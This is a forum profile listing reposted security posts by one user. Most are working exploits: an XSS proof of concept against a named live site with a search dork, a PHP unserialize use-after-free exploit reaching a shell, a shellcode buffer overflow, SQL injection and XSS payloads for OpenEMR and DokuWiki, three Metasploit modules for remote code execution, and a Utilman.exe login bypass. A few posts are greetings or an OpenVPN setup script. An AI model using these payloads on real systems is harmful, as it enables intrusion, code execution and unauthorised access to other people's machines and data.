Jump to content

Aerosol

Active Members
  • Posts

    3453
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by Aerosol

  1. # Affected software: # Type of vulnerability: # URL: http://www.uploadify.com/ # Discovered by: Provensec # Website: http://www.provensec.com #version 3.1 # Proof of concept uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf demo http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf dork:inurl:uploadify.swf ext:swf Source
  2. #Use After Free Vulnerability in unserialize() Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.2.3 - Release Date: 2015.3.20 > A use-after-free vulnerability was discovered in unserialize() with a specially defined object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code. Affected Versions ------------ Affected is PHP 5.6 < 5.6.7 Affected is PHP 5.5 < 5.5.23 Affected is PHP 5.4 < 5.4.39 Affected is PHP 5 <= 5.3.29 Affected is PHP 4 <= 4.4.9 Credits ------------ This vulnerability was disclosed by Taoguang Chen. Description ------------ ``` static inline int object_common2(UNSERIALIZE_PARAMETER, zend_long elements) { zval retval; zval fname; if (Z_TYPE_P(rval) != IS_OBJECT) { return 0; } //??? TODO: resize before if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_P(rval), elements, 1)) { return 0; } ZVAL_DEREF(rval); if (Z_OBJCE_P(rval) != PHP_IC_ENTRY && zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, "__wakeup", sizeof("__wakeup")-1)) { ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1); BG(serialize_lock)++; call_user_function_ex(CG(function_table), rval, &fname, &retval, 0, 0, 1, NULL); ``` A specially defined __wakeup() magic method lead to various problems. The simple code: ``` <?php class evilClass { public $var; function __wakeup() { unset($this->var); // $this->var = 'ryat'; } } $data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;R:4;}'); ?> ``` Object properties assignment or destroy operation leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code. Proof of Concept Exploit ------------ The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14. ``` <?php $f = $argv[1]; $c = $argv[2]; $fakezval1 = ptr2str(0x100b83008); $fakezval1 .= ptr2str(0x8); $fakezval1 .= "\x00\x00\x00\x00"; $fakezval1 .= "\x06"; $fakezval1 .= "\x00"; $fakezval1 .= "\x00\x00"; $data1 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}'; $x = unserialize($data1); $y = $x[2]; // zend_eval_string()'s address $y[0][0] = "\x6d"; $y[0][1] = "\x1e"; $y[0][2] = "\x35"; $y[0][3] = "\x00"; $y[0][4] = "\x01"; $y[0][5] = "\x00"; $y[0][6] = "\x00"; $y[0][7] = "\x00"; $fakezval2 = ptr2str(0x3b296324286624); // $f($c); $fakezval2 .= ptr2str(0x100b83000); $fakezval2 .= "\xff\xff\xff\xff"; $fakezval2 .= "\x05"; $fakezval2 .= "\x00"; $fakezval2 .= "\x00\x00"; $data2 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;a:1:{i:0;R:4;}}}'; $z = unserialize($data2); intval($z[2]); function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } class evilClass { public $var; function __wakeup() { unset($this->var); // $this->var = 'ryat'; } } ?> ``` Test the PoC on the command line, then any PHP code can be executed: ``` $ lldb php (lldb) target create "php" Current executable set to 'php' (x86_64). (lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)" Process 13472 launched: '/usr/bin/php' (x86_64) sh: no job control in this shell sh-3.2$ php -v PHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies sh-3.2$ exit exit Process 13472 exited with status = 0 (0x00000000) (lldb) ``` Source
  3. #!/usr/bin/python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow #[+] Date: 20-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R from struct import pack file="evilfile.wav" junk="\x41"*4112 eip = pack('<I',0x7C9D30D7) nops = "\x90" * 3 #Calc.exe Shellcode #POC:http://youtu.be/_uvHKonqO2g shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78" "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3" "\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd" "\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8" "\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5" "\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87" "\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca") writeFile = open (file, "w") writeFile.write(junk+eip+nops+shellcode) writeFile.close() Source
  4. Advisory ID: SGMA15-001 Title: DokuWiki persistent Cross Site Scripting Product: DokuWiki Version: 2014-09-29c and probably prior Vendor: www.dokuwiki.org Vulnerability type: Persistent XSS Risk level: Medium Credit: Filippo Cavallarin - segment.technology CVE: N/A Vendor notification: 2015-03-18 Vendor fix: 2015-03-19 Public disclosure: 2015-03-23 Details DokuWiki version 2014-09-29c (and probably prior) is vulnerable to Persistent Cross Site Scriptng in the admin page. An attacker may use this vulnerability to execute javascript in the context of a logged admin user. Since the vulnerable page has forms with the CSRF token (the same for all requests), a full backend compromise may be possible. To successfully exploit this vulenrability an attacked must: 1. have an account on the target site 2. trick and admin to visit a link or to edit user account Proof of concept: 1. change your account real name to: my name" autofocus onfocus="alert('code executed') 2. login as admin and try to edit the user profile from User Manager Solution Apply the latest hotfix from vendor's site References https://www.dokuwiki.org/ https://github.com/splitbrain/dokuwiki/issues/1081 Filippo Cavallarin https://segment.technology Source
  5. Advisory: Multiple reflecting/stored XSS- and SQLi-vulnerabilities in openEMR v.4.2.0 Advisory ID: SROEADV-2015-08 Author: Steffen Rösemann Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014) Vendor URL: http://www.open-emr.org Vendor Status: patched CVE-ID: to be assigned after release of advisory via OSS list ========================== Vulnerability Description: ========================== Electronic health records and medical practice management application OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS vulnerabilities. ================== Technical Details: ================== All below described vulnerabilities can only be exploited by an already authenticated user. ===================== SQL injection vulnerabilities ===================== An SQL injection vulnerability can be found in the facility_admin.php file and can be abused by an attacker via the fid-parameter. Exploit-Example: http:// {TARGET}/interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+ Another (blind) SQL injection vulnerability resides in the appt_encounter_report.php an can be abused by an attacker by modifying a the form_facility-parameter in a POST-request. Exploit-Example: POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/openemr-4.2.0/interface/reports/appt_encounter_report.php Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 120 form_facility=3%27+AND+substring(version(),1,1)=%275&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true The last (blind) SQL injection vulnerability resides in the appointments_report.php-file and can be as well abused by an attacker via crafting own SQL statements in the form_facility-parameter in a POST request. Exploit-Example: POST /openemr-4.2.0/interface/reports/appointments_report.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/openemr-4.2.0/interface/reports/appointments_report.php Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 199 form_facility=3%27+and+substring(version(),1,1)=%274&form_provider=&form_from_date=2015-01-13&form_to_date=2015-01-13&form_apptstatus=&form_apptcat=ALL&form_orderby=comment&patient=&form_refresh=true ============== XSS vulnerabilities ============== A reflecting XSS-vulnerability can be found in user_admin.php via the id-parameter. Exploit-Example: http:// {TARGET}interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E A stored XSS vulnerability resides in add_edit_event.php via the input-field "form_comments" and is executed in appointments_report.php. Exploit-Example: <script>alert(document.cookie)</script> ========= Solution: ========= Install the latest patch (released 21st March 2015, see [3]). ==================== Disclosure Timeline: ==================== 12/13-Jan-2015 – found the vulnerability 13-Jan-2015 - informed the developers 13-Jan-2015 – release date of this security advisory [without technical details] 13-Jan-2015 - vendor responded and announced a patch 20-Jan-2015 - vendor provides fix for testing purposes 20-Jan-2015 - agreement to release technical details when patch has been released 21-Mar-2015 – release date of the patch 22-Mar-2015 – release date of this security advisory 22-Mar-2015 – send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://www.open-emr.org [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-08.html [3] http://www.open-emr.org/wiki/index.php/OpenEMR_Patches Source
  6. Subject: Cisco UCSM username and password hashes sent via SYSLOG Impact: Information Disclosure / Privilege Elevation Vendor: Cisco Product: Cisco Unified Computing System Manager (UCSM) Notified: 2014.10.31 Fixed: 2015.03.06 ( 2.2(3e) ) Author: Tom Sellers ( tom at fadedcode.net ) Date: 2015.03.21 Description: ============ Cisco Unified Computing System Manager (UCSM) versions 1.3 through 2.2 sends local (UCSM) username and password hashes to the configured SYSLOG server every 12 hours. If the Fabric Interconnects are in a cluster then each member will transmit the data. SYSLOG Example ( portions of password hash replaced with <!snip!> ): Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:User1,$1$e<!snip!>E.,-1.000000,16372.000000 - securityd Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:admin,$1$J<!snip!>71,-1.000000,16372.000000 - securityd Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:samdme,!,-1.000000,16372.000000 - securityd Vulnerable environment(s): ========================== Cisco Unified Computing System Manager (UCSM) is a Cisco product that manages all aspects of the Unified Computing System (UCS) environment including Fabric Interconnects, B- Series blades servers and the related blade chassis. C-Series (non-blade) servers can also be managed. These solutions are deployed in high performance / high density compute solutions and allow for policy based and rapid deployment of resources. They are are typically found in Data Center class environments with 10/40 GB network and 8/16 GB Fibre Channel connectivity. Software Versions: 1.3 - 2.2(1b)A Hardware: Cisco 6120 XP, 6296 UP SYSLOG Configuration: - Level: Information - Facility: Local7 - Faults: Enabled - Audits: Enabled - Events: Disabled Risks: ====== 1. Individuals who have access to the SYSLOG logs may not be authorized to have access to the UCSM environment and this information represents an exposure. 2. Authorized users with the 'Operations' roles can configure SYSLOG settings, capture hashes, crack them, and elevate access to Administrator within the UCSM. 3. SYSLOG is transmitted in plain text. Submitter recommendations to vendor: ==================================== 1. Remove the username and password hash data from the SYSLOG output. 2. Allow the configuration of the SYSLOG destination port to enable easier segmentation of SYSLOG data on the log aggregation system. 3. Add support for TLS wrapped SYSLOG output. Vendor response/resolution: ========================== After being reported on October 30, 2014 the issue was handed from Cisco PSIRT to internal development where it was treated as a standard bug. Neither the PSIRT nor Cisco TAC were able to determine the status of the effort other than it was in progress with an undetermined release date. On March 6, 2015 version 2.2(3e) of the UCSM software bundle was released and the release notes contained the following text: --- Cisco UCS Manager Release 1.3 through Release 2.2 no longer sends UCS Manager username and password hashes to the configured SYSLOG server every 12 hours. --- For several weeks a document related to this issue could be found in the Cisco Security Advisories, Responses, and Alerts site [1] but this has since been removed. Documents detailing similar issues [2] have been released but none reference the Bug/Defect ID I was provided and the affected versions do not match. The following documents remain available: Public URL for Defect: https://tools.cisco.com/quickview/bug/CSCur54705 Bug Search (login required): https://tools.cisco.com/bugsearch/bug/CSCur54705 Release notes for 2.2(3e): http://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/release/notes/ucs_2_2_rn.html#21634 Associated vendor IDs: PSIRT-1394165707 CSCur54705 Timeline: ============ 2014.10.30 Reported to psirt@cisco.com 2014.11.04 Response from PSIRT, assigned PSIRT-1394165707 2014.11.06 Follow up questions from Cisco, response provided same day 2014.11.12 Status request. PSIRT responded that this had been handed to development and assigned defect id CSCur54705. 2014.12.04 As PSIRT doesn't own the bug any longer, opened TAC case requesting status. 2014.12.10 Response from Cisco TAC indicating that perhaps I should upgrade to the latest version at that time 2014.12.12 Discussion with TAC, unable to gather required status update internally, TAC case closed with my permission 2015.02.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.02.05 Sent status update request to PSIRT, response was that bug was fixed internally, release pending testing, release cycle, etc. 2015.02.11 Follow up from Cisco to ensure that no additional information was required, closure of my request with my permission 2015.02.13 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.03.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information 2015.03.06 Update to public bug document, indicates that vulnerability is fixed in 2.2(3e) Reference: 1 - http://tools.cisco.com/security/center/publicationListing.x 2 - http://tools.cisco.com/security/center/viewAlert.x?alertId=36640 ( CVE-2014-8009 ) Source
  7. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/exploitation/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox Proxy Prototype Privileged Javascript Injection', 'Description' => %q{ This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'joev' # discovery and metasploit module ], 'DisclosureDate' => "Jan 20 2014", 'References' => [ ['CVE', '2014-8636'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1120261'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636' ] ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(31, 34) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ]) ], self.class) end def on_request_exploit(cli, request, target_info) send_response_html(cli, generate_html(target_info)) end def default_html "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected." end def generate_html(target_info) key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin js = js_obfuscate %Q| var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; var props = {}; props.has = function(n){ if (!window.top.x && n=='nodeType') { window.top.x=window.open("chrome://browser/content/browser.xul", "x", "chrome,,top=-9999px,left=-9999px,height=100px,width=100px"); if (window.top.x) { Object.setPrototypeOf(document, pro); setTimeout(function(){ x.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>'; setTimeout(function(){ x.messageManager.loadFrameScript('data:,'+key, false); setTimeout(function(){ x.close(); }, 100) }, 100) }, 100); } } } var pro = Object.getPrototypeOf(document); Object.setPrototypeOf(document, Proxy.create(props)); | %Q| <!doctype html> <html> <body> <script> #{js} </script> #{datastore['CONTENT'] || default_html} </body> </html> | end end Source
  8. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Belkin Play N750 login.cgi Buffer Overflow', 'Description' => %q{ This module exploits a remote buffer overflow vulnerability on Belkin Play N750 DB Wireless Dual-Band N+ Router N750 routers. The vulnerability exists in the handling of HTTP queries with long 'jump' parameters addressed to the /login.cgi URL, allowing remote unauthenticated attackers to execute arbitrary code. This module was tested in an emulated environment, using the version 1.10.16.m of the firmwarey. }, 'Author' => [ 'Marco Vaz <mv[at]integrity.pt>', # Vulnerability discovery and msf module (telnetd) 'Michael Messner <devnull[at]s3cur1ty.de>', # msf module with echo stager ], 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSLE, 'References' => [ ['CVE', '2014-1635'], ['EDB', '35184'], ['BID', '70977'], ['OSVDB', '114345'], ['URL', 'https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/'], ['URL', 'http://www.belkin.com/us/support-article?articleNum=4831'] ], 'Targets' => [ [ 'Belkin Play N750 DB Wireless Dual-Band N+ Router, F9K1103, firmware 1.10.16.m', { 'Offset' => 1379, } ] ], 'DefaultOptions' => { 'RPORT' => 8080 }, 'DisclosureDate' => 'May 09 2014', 'DefaultTarget' => 0)) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => '/' }) if res && [200, 301, 302].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /minhttpd/ && res.body =~ /u_errpaswd/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200 ) end def prepare_shellcode(cmd) shellcode = rand_text_alpha_upper(target['Offset']) shellcode << 'e' << cmd shellcode << "\n\n" end def execute_command(cmd, opts) shellcode = prepare_shellcode(cmd) begin res = send_request_cgi({ 'method' => 'POST', 'uri' => '/login.cgi', 'vars_post' => { 'GO' => '', 'jump' => shellcode, } }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell def initialize(info = {}) super(update_info(info, 'Name' => 'Powershell Remoting Remote Command Execution', 'Description' => %q{ Uses Powershell Remoting (TCP 47001) to inject payloads on target machines. If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise use a HOSTFILE to supply a list of known hostnames. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell' ], 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'DisclosureDate' => 'Jan 01 1999', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', 'shell' ], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] ], 'DefaultTarget' => 0 )) register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as' ]), OptString.new('SMBPass', [ false, 'The password for the specified username' ]), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]), OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]), OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]), # Move this out of advanced OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ]) ]) register_advanced_options( [ OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60]) ], self.class) end def exploit if !datastore['ExitOnSession'] && !job_id fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)") end unless datastore['RHOSTS'] || datastore['HOSTFILE'] fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.") end if datastore['SMBUser'] && datastore['SMBPass'].nil? fail_with(Failure::BadConfig, "Need both username and password set.") end if datastore['RHOSTS'] ip_list = "$iplist=" Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip| ip_list << "'#{ip}'," end # Remove trailing comma... ip_list = ip_list[0..-2] ip_list << ";" end known_hosts = "" if datastore['HOSTFILE'] ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname| hostname.strip! known_hosts << "'#{hostname}'," unless hostname.blank? end known_hosts = known_hosts[0..-2] end command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) ps = <<EOF #{generate_credentials} $ResultList=@(#{known_hosts}); #{ip_list} foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName}; Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} } EOF if datastore['SMBUser'] ps << " -Credential $creds" end # If the host process terminates too quickly the jobs will die # before they spawn in a new process. ps << ";Sleep 20;" ps.gsub!("\n", "") command = generate_psh_command_line( noprofile: true, windowstyle: 'hidden', command: ps ) print_status("Executing command...") begin cmd_exec(command) rescue Rex::TimeoutError end stime = Time.now.to_f loop do break if session_created? && datastore['ExitOnSession'] break if datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) Rex.sleep(1) end print_status("Completed") end def generate_credentials(domain = datastore['SMBDomain'], user = datastore['SMBUser'], pass = datastore['SMBPass']) creds = "" unless user.nil? creds = "$pass=ConvertTo-SecureString -string '#{pass}' -asPlainText -force;"\ "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist " if domain.nil? creds << "'#{user}'" else creds << "'#{domain}\\#{user}'" end creds << ",$pass;" end creds end end Source
  10. Aerosol

    Dilema

    Salut si bine ai venit, frumoasa prezentare sper sa stai cat mai mult pe aici!
  11. Salut si bine ai venit. Avatarul face totul
  12. 1) Boot from the Windows Server 2012 ISO 2) At Windows Setup menu, click Next 3) Chose Repair your computer 4) On Choose and option click Troubleshoot 5) Under Advanced options click Command Prompt Now on command prompt, run commands: d: cd windows\system32 ren Utilman.exe Utilman.exe.old copy cmd.exe Utilman.exe 6) Close command prompt and click “Continue”. 7) Server will now boot and present the logon screen. Here press Windows Key + U 8) In prompt you can now change the password typing the command: net user administrator Password This will set the password for Administrator to Password (case sensitive) Close CMD and you should be able to log back onto the server using the password you have provided in the last step. Author: razvan1@hy
  13. Hello all, Today we will install a OpenVPN server. For this copy/paste this script (edit email, vpn dns name and client certificate name as you need). After this run command chmod +x openvpn.sh && ./openvpn.sh and run all steps showed from 1 to 16 because 17 is for quit. To run each step when apear #? pres 1, after done press 2 and so on until 16. Enjoy #!/bin/bash #title :openvpn.sh #author :razvan1@hy #date :20141209 #usage : Put in to /root directory and bash -X openvpn.sh #============================================================================== SELECTION="update-os test-tun install-ovpn add-vars import-vars delete-old-certs generate-ca generate-cert generate-dh generate-client generate-hmac place-certs conf-ovpn-server forwarding set-iptables restart-ovpn quit" select options in $SELECTION; do if [ "$options" = "update-os" ]; then echo "Updating OS!" apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y elif [ "$options" = "test-tun" ]; then echo "Test if it supports TUN!" test ! -c /dev/net/tun && echo openvpn requires tun support || echo tun is available elif [ "$options" = "install-ovpn" ]; then echo "Install OpenVPN" apt-get install openvpn -y && cp -prv /usr/share/doc/openvpn/examples/easy-rsa/2.0 /root/easy-rsa && cd /root/easy-rsa && cp vars{,.orig} elif [ "$options" = "add-vars" ]; then echo "export KEY_COUNTRY="RO" export KEY_PROVINCE="B" export KEY_CITY="Bucuresti" export KEY_ORG="ORG_name" export KEY_EMAIL="user@mail.ro" export KEY_EMAIL=user@mail.ro export KEY_CN=vpn.domain.ro export KEY_NAME=vpn.domain.ro export KEY_OU=IT #export PKCS11_MODULE_PATH=changeme #export PKCS11_PIN=1234 " > /root/easy-rsa/vars elif [ "$options" = "import-vars" ]; then echo "Import vars" cd /root/easy-rsa/ && source ./vars elif [ "$options" = "delete-old-certs" ]; then echo "delete previously created certs" cd /root/easy-rsa/ && ./clean-all elif [ "$options" = "generate-ca" ]; then echo "generate the CA certificate" cd /root/easy-rsa/ && ./build-ca elif [ "$options" = "generate-cert" ]; then echo "generate VPN server certificate" cd /root/easy-rsa/ && ./build-key-server SERVER elif [ "$options" = "generate-dh" ]; then echo "generate the Diffie-Hellman PEM certificate" cd /root/easy-rsa/ && ./build-dh elif [ "$options" = "generate-client" ]; then echo "generate client certificate" cd /root/easy-rsa/ && ./build-key razvan1 elif [ "$options" = "generate-hmac" ]; then echo "generate secret Hash-based Message Authentication Code (HMAC)" /usr/sbin/openvpn --genkey --secret /root/easy-rsa/keys/ta.key elif [ "$options" = "place-certs" ]; then echo "place the certificates and keys on the server in the /etc/openvpn/certs directory" mkdir -p /etc/openvpn/certs && cp -pv /root/easy-rsa/keys/{ca.{crt,key},SERVER.{crt,key},ta.key,dh2048.pem} /etc/openvpn/certs/ elif [ "$options" = "conf-ovpn-server" ]; then echo "set-up OpenVPN server configuration file in /etc/openvpn/server.conf" touch /etc/openvpn/server.conf && echo "port 1194 proto udp dev tun ca /etc/openvpn/certs/ca.crt cert /etc/openvpn/certs/SERVER.crt key /etc/openvpn/certs/SERVER.key dh /etc/openvpn/certs/dh1024.pem tls-auth /etc/openvpn/certs/ta.key 0 server 10.0.0.0 255.255.255.0 ifconfig-pool-persist ipp.txt push "redirect-gateway def1 bypass-dhcp" push "dhcp-option DNS 8.8.8.8" push "dhcp-option DNS 8.8.4.4" client-to-client keepalive 20 120 client-config-dir ccd cipher DES-EDE3-CBC comp-lzo max-clients 10 user nobody group nogroup persist-key persist-tun log /var/log/openvpn.log status /var/log/openvpn-status.log verb 5 mute 20" > /etc/openvpn/server.conf && mkdir /etc/openvpn/ccd elif [ "$options" = "forwarding" ]; then echo "enable network forwarding" echo 1 > /proc/sys/net/ipv4/ip_forward && sysctl -p elif [ "$options" = "set-iptables" ]; then echo "set-up the following iptables rules" /sbin/iptables -A INPUT -p udp -m state --state NEW -m udp --dport 1194 -j ACCEPT /sbin/iptables -A FORWARD -s 10.0.0.0/24 -j ACCEPT /sbin/iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT /sbin/iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -o eth0 -j MASQUERADE elif [ "$options" = "restart-ovpn" ]; then echo "start the OpenVPN server and add enable it to run on system's start-up" service openvpn restart && update-rc.d -f openvpn defaults elif [ "$options" = "quit" ]; then echo "You have selected $options" exit else clear; echo "please select some options" fi done Credit's to:razvan1@hy
